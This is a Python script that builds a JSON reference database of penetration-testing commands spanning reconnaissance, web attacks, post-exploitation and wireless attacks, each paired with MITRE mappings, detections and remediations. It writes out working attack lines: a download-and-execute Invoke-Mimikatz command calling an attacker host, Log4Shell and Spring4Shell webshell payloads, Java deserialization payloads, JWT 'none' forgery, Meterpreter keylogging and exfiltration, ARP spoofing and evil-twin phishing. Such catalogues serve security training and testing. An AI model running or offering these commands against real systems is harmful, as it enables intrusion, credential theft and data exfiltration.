#!/usr/bin/env python3
"""Batch 8 — final push to 400."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== RECON FINAL (15) =====================
R8=[
e("nmap-scan-timing","nmap","reconnaissance",1,LWM,"nmap -sS -T0 --max-retries 1 --scan-delay 5s <target>","Paranoid Timing Scan","Extremely slow scan to avoid IDS detection — one probe every 5+ seconds.",{"-T0":"Paranoid timing","--scan-delay 5s":"Wait between probes"},"(Very slow output — takes hours)","Evade IDS on highly monitored targets — patience required.",["Root","Lots of time"],["T1046","T1205"],"Defense Evasion",["Very difficult to detect","Blends with normal traffic"],["Behavioral analysis","Long-term traffic monitoring"],["Takes too long for engagement timeline"],["nmap -T2 (polite, faster compromise)"],["https://nmap.org/book/man-performance.html"],["stealth","slow","evasion","paranoid","timing"]),
e("nmap-source-port","nmap","reconnaissance",1,L,"nmap -sS --source-port 53 -p- <target>","Source Port Manipulation","Scans using source port 53 (DNS) — some firewalls allow DNS traffic through.",{"--source-port 53":"Use port 53 as source"},"PORT   STATE SERVICE\n80/tcp open  http (via source port 53)","Bypass firewalls that allow DNS (port 53) traffic unconditionally.",["Root privileges"],["T1046","T1205"],"Defense Evasion",["Traffic from port 53 that isn't DNS"],["Stateful firewalls","Deep packet inspection"],["Firewall does DPI (detects non-DNS)"],["nmap -D (decoys)","nmap --data-length (pad packets)"],["https://nmap.org/book/man-bypass-firewalls-ids.html"],["source-port","firewall-bypass","dns","evasion"]),
e("nmap-ipv6","nmap","reconnaissance",1,LWM,"nmap -6 -sV -p- <ipv6_target>","IPv6 Scan","Scans IPv6 addresses — often overlooked and less protected than IPv4.",{"-6":"IPv6 mode"},"PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 8.9\n80/tcp open  http    Apache 2.4","Scan IPv6 addresses — many organizations forget to firewall IPv6.",["IPv6 target address","IPv6 connectivity"],["T1046"],"Discovery",["IPv6 scanning activity"],["Apply same firewall rules to IPv6","Disable IPv6 if not needed"],["No IPv6 connectivity"],["nmap -6 --script discovery"],["https://nmap.org/book/man-port-scanning-techniques.html"],["ipv6","scanning","overlooked","network"]),
e("masscan-banner","masscan","reconnaissance",1,L,"masscan -p80,443,8080 <range>/24 --banners --rate 1000","Masscan with Banner Grabbing","Fast port scan with banner grabbing — identifies services at scale.",{"--banners":"Grab service banners","--rate":"Packets per second"},"Banner on port 80/tcp: HTTP/1.1 200 OK\\r\\nServer: nginx","Rapid service identification across large networks.",["Root","Network range"],["T1046"],"Discovery",["High packet rate"],["Rate limiting","IDS"],["Rate too high for network"],["nmap -sV (more accurate)"],["https://github.com/robertdavidgraham/masscan"],["masscan","banner","fast","large-network"]),
e("cloud-enum","cloud_enum","reconnaissance",1,L,"cloud_enum -k <company_name> -l results.txt","Cloud Resource Enumeration","Discovers cloud resources (S3 buckets, Azure blobs, GCP buckets) for a company.",{"-k":"Keyword/company name","-l":"Output file"},"[+] S3 Bucket: company-backups.s3.amazonaws.com (PUBLIC)\n[+] Azure Blob: company.blob.core.windows.net","Find exposed cloud storage buckets that may contain sensitive data.",["Company name/keywords"],["T1530"],"Collection",["Passive — queries cloud providers"],["Secure bucket permissions","Enable logging"],["No cloud resources found"],["s3scanner","grayhatwarfare.com"],["https://github.com/initstring/cloud_enum"],["cloud","s3","azure","gcp","bucket","storage"]),
]

# ===================== WEB FINAL (20) =====================
W8=[
e("burp-collaborator","burpsuite","web_testing",4,LWM,"# Burp Collaborator: Generate payload\n# Insert: ${jndi:ldap://xyz.burpcollaborator.net/a}\n# Check Collaborator tab for callbacks","Blind Vulnerability Detection (Collaborator)","Uses out-of-band callbacks to detect blind vulnerabilities (SSRF, XXE, Log4Shell).",{"Collaborator":"Burp's callback server"},"[+] DNS lookup received from target\n[+] HTTP request received → confirms blind SSRF","Detect blind vulnerabilities that don't show output in responses.",["Burp Suite Pro","Target can make outbound requests"],["T1190"],"Initial Access",["Outbound DNS/HTTP to unusual domains"],["Egress filtering","Block unnecessary outbound"],["Target can't make outbound requests"],["interactsh (free alternative)","webhook.site"],["https://portswigger.net/burp/documentation/collaborator"],["blind","oob","collaborator","ssrf","detection"]),
e("interactsh-oob","interactsh","web_testing",4,L,"interactsh-client","Out-of-Band Testing (Free)","Free alternative to Burp Collaborator — generates unique URLs for blind vulnerability detection.",{"interactsh-client":"Start client, get unique URL"},"[+] URL: abc123.interact.sh\n[+] Received DNS query from 10.0.0.5\n[+] Received HTTP request from target","Detect blind SSRF, XXE, command injection via out-of-band callbacks.",["interactsh installed","Target can make outbound requests"],["T1190"],"Initial Access",["Outbound requests to interact.sh domains"],["Egress filtering"],["No outbound connectivity from target"],["Burp Collaborator","webhook.site","dnslog.cn"],["https://github.com/projectdiscovery/interactsh"],["oob","blind","free","callback","detection"]),
e("log4shell-test","curl","web_testing",4,LWM,"curl -H 'X-Api-Version: ${jndi:ldap://<callback>/a}' http://<target>/","Log4Shell Test (CVE-2021-44228)","Tests for Log4j RCE by injecting JNDI lookup in various headers.",{"${jndi:ldap://...}":"Log4j JNDI lookup payload","X-Api-Version":"Header likely to be logged"},"# If vulnerable: DNS/LDAP callback received at your server","Test for one of the most critical vulnerabilities ever — affects Java applications using Log4j.",["Java application","Callback server (interactsh)"],["T1190"],"Initial Access",["JNDI lookup strings in logs","Outbound LDAP connections"],["Update Log4j to 2.17+","Set log4j2.formatMsgNoLookups=true"],["Not Java application","Already patched"],["nuclei -t cves/2021/CVE-2021-44228","log4j-scan"],["https://www.lunasec.io/docs/blog/log4j-zero-day/"],["log4shell","log4j","jndi","rce","critical","cve"]),
e("spring4shell-test","curl","web_testing",4,LWM,"curl -X POST http://<target>/ -H 'Content-Type: application/x-www-form-urlencoded' -d 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp'","Spring4Shell Test (CVE-2022-22965)","Tests for Spring Framework RCE via class loader manipulation.",{"POST data":"ClassLoader manipulation payload"},"# If vulnerable: JSP webshell created on server","Test Spring Framework applications for critical RCE vulnerability.",["Spring Framework application","JDK 9+","Tomcat deployment"],["T1190"],"Initial Access",["Unusual POST parameters","ClassLoader manipulation in logs"],["Update Spring Framework","Use WAF rules"],["Not Spring/not Tomcat/patched"],["nuclei -t cves/2022/CVE-2022-22965"],["https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement"],["spring4shell","spring","rce","cve","java"]),
e("deserialization-ysoserial","ysoserial","web_testing",4,L,"java -jar ysoserial.jar CommonsCollections1 'ping <attacker>' | base64","Java Deserialization Payload","Generates Java deserialization payloads for RCE in vulnerable applications.",{"CommonsCollections1":"Gadget chain","'ping <attacker>'":"Command to execute","base64":"Encode for injection"},"# Base64 payload for injection into deserialization points","Exploit Java deserialization vulnerabilities for remote code execution.",["Java application with deserialization","Vulnerable library in classpath"],["T1059"],"Execution",["Deserialization errors","Unusual object types in traffic"],["Don't deserialize untrusted data","Use allowlists for classes"],["Wrong gadget chain for target libraries"],["marshalsec","JNDI-Injection-Exploit"],["https://github.com/frohoff/ysoserial"],["deserialization","java","rce","gadget-chain"]),
e("wfuzz-auth-bypass","wfuzz","web_testing",4,L,"wfuzz -c -z file,/usr/share/seclists/Fuzzing/Unicode.txt -u http://<target>/admin/FUZZ --hc 403","Path Traversal / Auth Bypass Fuzzing","Fuzzes URL paths with Unicode and special characters to bypass access controls.",{"-z file":"Payload source","--hc 403":"Hide 403 (blocked)"},"200  /admin/%2e%2e/config\n200  /admin/..;/dashboard","Bypass 403 restrictions using path normalization tricks.",["403 on restricted path"],["T1190"],"Initial Access",["Unusual URL encoding in logs","Path traversal patterns"],["Normalize paths before ACL check","Use allowlists"],["All bypasses blocked"],["403bypasser","byp4xx"],["https://github.com/xmendez/wfuzz"],["auth-bypass","403","path-traversal","unicode","fuzzing"]),
e("api-jwt-none","curl","web_testing",4,LWM,"# Change JWT header algorithm to 'none':\n# {\"alg\":\"none\",\"typ\":\"JWT\"}\n# Remove signature\ncurl -H 'Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' http://<target>/api/admin","JWT Algorithm None Attack","Exploits JWT implementations that accept 'none' algorithm — bypasses signature verification.",{"alg: none":"No signature required"},"{\n  \"status\": \"success\",\n  \"user\": \"admin\"\n}","Bypass JWT authentication by setting algorithm to 'none' — removes signature requirement.",["JWT-based authentication","Server accepts 'none' algorithm"],["T1078"],"Initial Access",["JWT with 'none' algorithm","Missing signature"],["Reject 'none' algorithm","Validate algorithm server-side"],["Server properly validates algorithm"],["jwt_tool -T","manual base64 editing"],["https://portswigger.net/web-security/jwt"],["jwt","none","algorithm","bypass","authentication"]),
e("api-mass-assignment","curl","web_testing",4,LWM,"curl -X POST http://<target>/api/register -H 'Content-Type: application/json' -d '{\"username\":\"hacker\",\"password\":\"pass\",\"role\":\"admin\",\"isAdmin\":true}'","Mass Assignment / Parameter Pollution","Adds extra parameters to requests hoping the backend blindly assigns them to the object.",{"role: admin":"Extra parameter","isAdmin: true":"Another attempt"},"{\n  \"id\": 5,\n  \"username\": \"hacker\",\n  \"role\": \"admin\"\n}","Escalate privileges by adding hidden parameters that the API blindly accepts.",["API endpoint accepting JSON","Knowledge of internal field names"],["T1078"],"Privilege Escalation",["Unexpected fields in request bodies","Role changes without admin action"],["Use DTOs/allowlists for input","Never bind request directly to model"],["API properly validates fields"],["arjun (find hidden params)","param-miner (Burp)"],["https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/"],["mass-assignment","api","privilege-escalation","parameters"]),
]

# ===================== POSTEX FINAL (15) =====================
PX8=[
e("meterpreter-screenshot","metasploit","post_exploitation",6,LW,"meterpreter > screenshot","Capture Screenshot","Takes a screenshot of the victim's desktop.",{"screenshot":"Capture current screen"},"Screenshot saved to: /tmp/screenshot.jpeg","Capture evidence of user activity or sensitive information on screen.",["Active Meterpreter session"],["T1113"],"Collection",["Screen capture API calls"],["Lock screen when away","DLP"],["No GUI session active"],["meterpreter > screenshare (live)"],["https://docs.metasploit.com"],["screenshot","evidence","desktop","collection"]),
e("meterpreter-keyscan","metasploit","post_exploitation",6,W,"meterpreter > keyscan_start\n# Wait...\nmeterpreter > keyscan_dump","Keylogger","Starts a keylogger to capture typed passwords and sensitive data.",{"keyscan_start":"Begin logging","keyscan_dump":"Show captured keys"},"Keystrokes:\nadmin@corp.com\tP@ssw0rd123\nconfidential project details...","Capture passwords and sensitive information typed by the user.",["Meterpreter session","User actively typing"],["T1056.001"],"Collection",["Keylogger API hooks","Unusual process behavior"],["EDR","Secure input fields"],["No user activity"],["manual keylogger binary"],["https://docs.metasploit.com"],["keylogger","capture","passwords","surveillance"]),
e("meterpreter-download","metasploit","post_exploitation",6,LW,"meterpreter > download C:\\Users\\admin\\Desktop\\passwords.xlsx","Download File","Downloads a file from the compromised system to your machine.",{"download":"Transfer file to attacker"},"[*] Downloading: passwords.xlsx\n[*] Downloaded 45.2 KB","Exfiltrate sensitive files from compromised systems.",["Meterpreter session","File path known"],["T1005"],"Collection",["File access events","Data transfer"],["DLP","File access monitoring"],["File doesn't exist"],["scp","netcat file transfer"],["https://docs.metasploit.com"],["download","exfiltration","file","transfer"]),
e("meterpreter-upload","metasploit","post_exploitation",6,LW,"meterpreter > upload /tools/mimikatz.exe C:\\temp\\m.exe","Upload File","Uploads a file from attacker to the compromised system.",{"upload":"Transfer file to target"},"[*] Uploading: mimikatz.exe → C:\\temp\\m.exe\n[*] Uploaded 1.2 MB","Transfer tools and payloads to compromised systems.",["Meterpreter session"],["T1105"],"Command and Control",["New file creation","File write events"],["Application whitelisting","Monitor temp directories"],["AV quarantines uploaded file"],["certutil -urlcache","powershell iwr"],["https://docs.metasploit.com"],["upload","transfer","tools","delivery"]),
e("meterpreter-sysinfo","metasploit","post_exploitation",6,LW,"meterpreter > sysinfo","System Information","Displays target system information — OS, architecture, domain, hostname.",{"sysinfo":"Get system details"},"Computer: PC01\nOS: Windows 10 (10.0 Build 19045)\nArchitecture: x64\nDomain: CORP\nMeterpreter: x64/windows","Quick system identification after gaining access.",["Meterpreter session"],["T1082"],"Discovery",["System info queries"],["N/A"],["N/A"],["systeminfo (cmd)","uname -a (Linux)"],["https://docs.metasploit.com"],["sysinfo","identification","os","architecture"]),
e("meterpreter-migrate","metasploit","post_exploitation",6,W,"meterpreter > migrate -N explorer.exe","Process Migration","Migrates Meterpreter to another process — evades detection and gains stability.",{"-N explorer.exe":"Migrate to process by name"},"[*] Migrating from 1234 to 5678 (explorer.exe)\n[*] Migration completed successfully","Move to a stable process to avoid detection and survive if original process dies.",["Meterpreter session","Target process accessible"],["T1055"],"Defense Evasion",["Process injection events (Sysmon 8)","Unusual memory allocation"],["EDR process injection detection","Protected processes"],["Insufficient privileges for target process"],["manual process injection"],["https://docs.metasploit.com"],["migrate","process","evasion","stability"]),
e("crackmapexec-wdigest","netexec","post_exploitation",6,L,"netexec smb <target> -u admin -p pass -M wdigest -o ACTION=enable","Enable WDigest (Plaintext Passwords)","Enables WDigest authentication so next logon stores plaintext password in memory.",{"-M wdigest":"WDigest module","ACTION=enable":"Enable plaintext storage"},"[+] WDigest enabled. Next logon will store plaintext credentials.","Enable WDigest so mimikatz can extract plaintext passwords on next login.",["Admin access","Target is Windows"],["T1112"],"Defense Evasion",["Registry modification (UseLogonCredential)","WDigest setting change"],["Monitor WDigest registry key","Credential Guard"],["Credential Guard enabled"],["reg add HKLM\\SYSTEM\\...\\WDigest /v UseLogonCredential /t REG_DWORD /d 1"],["https://github.com/Pennyw0rth/NetExec"],["wdigest","plaintext","credentials","registry"]),
e("invoke-mimikatz","powershell","post_exploitation",6,W,"IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds","Invoke-Mimikatz (Fileless)","Runs Mimikatz entirely in memory via PowerShell — no binary on disk.",{"IEX":"Invoke-Expression (download and execute)","Invoke-Mimikatz":"PowerShell mimikatz wrapper"},"Hostname: PC01 / S-1-5-21-...\nmsv:\n Username: admin\n NTLM: fc525c96...","Extract credentials without writing mimikatz.exe to disk — harder to detect.",["PowerShell access","Admin privileges","AMSI bypass may be needed"],["T1003.001"],"Credential Access",["PowerShell script block logging","AMSI alerts","Memory-only execution"],["AMSI","Constrained Language Mode","Script block logging"],["AMSI blocks","CLM enabled"],["pypykatz","SharpKatz","nanodump"],["https://github.com/PowerShellMafia/PowerSploit"],["mimikatz","fileless","powershell","memory","credentials"]),
]

# ===================== WIRELESS/CLOUD/CONTAINER (15) =====================
MISC8=[
e("wifiphisher-evil-twin","wifiphisher","wireless",6,L,"wifiphisher --essid CorpWiFi -p firmware-upgrade","WiFiPhisher (Automated Evil Twin)","Automated evil twin + captive portal attack — presents fake firmware upgrade page.",{"--essid":"Target network name","-p":"Phishing scenario"},"[*] Deauthing clients from CorpWiFi\n[*] Clients connecting to evil twin\n[*] Credentials captured: admin/P@ss123","Automated WiFi phishing — deauths clients, creates evil twin, captures credentials.",["Two wireless adapters"],["T1557"],"Credential Access",["Duplicate SSID","Deauth frames","Captive portal"],["802.1X enterprise","Certificate pinning","WIDS"],["Victims don't connect"],["fluxion","manual hostapd+dnsmasq"],["https://github.com/wifiphisher/wifiphisher"],["wifiphisher","evil-twin","phishing","automated","captive-portal"]),
e("bettercap-arp-spoof","bettercap","wireless",6,L,"bettercap -iface eth0 -eval 'set arp.spoof.targets <victim_ip>; arp.spoof on; net.sniff on'","ARP Spoofing (MITM)","Performs ARP spoofing to intercept traffic between victim and gateway.",{"arp.spoof.targets":"Victim IP","arp.spoof on":"Start spoofing","net.sniff on":"Capture traffic"},"[*] ARP spoofing active\n[*] Captured: HTTP POST /login user=admin&pass=secret","Intercept network traffic to capture credentials and sensitive data.",["Same network segment","Root privileges"],["T1557.002"],"Credential Access",["Duplicate ARP entries","Unusual ARP traffic"],["Static ARP entries","Dynamic ARP Inspection","HTTPS everywhere"],["Target uses HTTPS (encrypted)"],["arpspoof","ettercap"],["https://www.bettercap.org"],["arp","spoofing","mitm","sniffing","network"]),
e("trivy-container","trivy","vulnerability_assessment",3,L,"trivy image <image_name>:<tag>","Container Image Vulnerability Scan","Scans Docker/OCI container images for known vulnerabilities in OS packages and libraries.",{"image":"Scan mode","<image_name>":"Container image to scan"},"CRITICAL: CVE-2021-44228 (log4j-core 2.14.1)\nHIGH: CVE-2023-1234 (openssl 1.1.1)\nTotal: 45 vulnerabilities (12 CRITICAL)","Scan container images before deployment to find vulnerable packages.",["Docker image available","trivy installed"],["T1595"],"Reconnaissance",["N/A — local scan"],["Scan images in CI/CD","Use minimal base images","Update regularly"],["Not scanning all layers"],["grype","docker scout","snyk container"],["https://github.com/aquasecurity/trivy"],["container","docker","vulnerability","image","scan"]),
e("kube-bench-audit","kube-bench","vulnerability_assessment",3,L,"kube-bench run --targets master,node","Kubernetes Security Benchmark","Checks Kubernetes cluster against CIS Kubernetes Benchmark.",{"--targets master,node":"Check both master and node configurations"},"[FAIL] 1.1.1 Ensure API server --anonymous-auth is set to false\n[PASS] 1.1.2 Ensure API server --basic-auth-file is not set\n47 checks PASS, 12 FAIL","Audit Kubernetes security configuration against CIS benchmarks.",["Access to Kubernetes nodes","kube-bench installed"],["T1595"],"Reconnaissance",["N/A — local audit"],["Fix failing CIS checks","Implement RBAC","Network policies"],["Not running on all node types"],["kubescape","kube-hunter"],["https://github.com/aquasecurity/kube-bench"],["kubernetes","cis","benchmark","audit","security"]),
e("prowler-cloud","prowler","vulnerability_assessment",3,L,"prowler aws --severity critical high","Cloud Security Assessment (AWS)","Scans AWS account for security misconfigurations and compliance issues.",{"aws":"AWS provider","--severity":"Filter by severity"},"CRITICAL: S3 bucket 'backups' is publicly accessible\nHIGH: Root account has no MFA\nHIGH: Security groups allow 0.0.0.0/0 on port 22","Comprehensive AWS security audit — checks hundreds of security controls.",["AWS credentials configured","prowler installed"],["T1595"],"Reconnaissance",["API calls from unusual source"],["Fix critical findings","Enable MFA","Restrict security groups"],["No AWS access"],["ScoutSuite","steampipe"],["https://github.com/prowler-cloud/prowler"],["aws","cloud","security","audit","misconfiguration"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 8 (final push)...")
    save("bulk8_recon.json",R8)
    save("bulk8_web.json",W8)
    save("bulk8_postex.json",PX8)
    save("bulk8_misc.json",MISC8)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
